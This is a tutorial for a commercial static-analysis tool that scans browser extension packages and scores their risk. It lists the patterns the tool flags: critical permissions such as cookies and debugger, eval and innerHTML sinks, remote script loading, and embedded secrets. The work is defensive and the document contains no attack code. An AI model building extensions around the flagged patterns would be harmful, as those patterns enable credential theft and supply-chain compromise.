Tutorial: Browser extension security scanning
Statically analyze a browser extension package. Pencheff strips the CRX header, unpacks the ZIP, and scores the manifest, scripts, and resources — the analysis CRXcavator pioneered, extended with modern exfiltration and obfuscation checks.
Scenario
- Artifact.
acme-extension.crx(Chrome/Edge) or.xpi(Firefox), or a zipped unpacked extension, hosted at a URL you control. - Goal. A risk profile — over-broad permissions, weak CSP, remote-code loading, DOM injection sinks, and embedded secrets.
Inputs you need
| Item | Where it goes |
|---|---|
Artifact URL (.crx / .xpi / .zip) | Artifact URL field |
| SHA-256 of the file | SHA-256 field — integrity gate |
shasum -a 256 acme-extension.crxTime budget
| Phase | Wall time |
|---|---|
| Fetch + verify + unpack | < 1 min |
| Manifest + code + secrets analysis | < 1 min |
| Total | ~1–2 min |
Steps
1. Register the target
app.pencheff.com → Register target →
Mobile & Client Security → Browser Extension:
- Name —
Acme extension — v3.2 - Artifact URL —
https://builds.acme.com/acme-extension.crx - SHA-256 — the digest from above
2. Run the scan
Commission scan. Pencheff verifies the download, strips the CRX
Cr24 header (CRX2/CRX3) to recover the ZIP, and analyzes:
- manifest.json — permission risk (
debugger,cookies,<all_urls>,proxy= critical;tabs,nativeMessaging,management= sensitive), broadhost_permissions, weakcontent_security_policy(unsafe-eval/unsafe-inline), broadexternally_connectable, content-script injection surface, and MV2 deprecation. - bundled JS/HTML — DOM sinks (
eval,new Function,.innerHTML,document.write), remote-code loading (importScripts/remote<script src>— banned under MV3), and external message handlers. - secrets — hardcoded keys/tokens across the bundle.
The extension is never loaded in a browser.
3. Read the findings
Findings are tagged extension_misconfig and extension_secrets, each
with severity, CWE, the manifest key or script file, and remediation.
Manifest V2 packages are flagged as a deprecated, weaker security model. Remote-code loading is the highest-severity pattern — it’s the classic supply-chain vector (e.g. the Cyberhaven incident) and is banned under Manifest V3.
Deliverable
An extension risk register exportable to DOCX/JSON/CSV — useful for allow/deny decisions on third-party extensions in a managed fleet.
Next
- Tutorial: Desktop app static scanning
- Browser Extension Security — feature reference.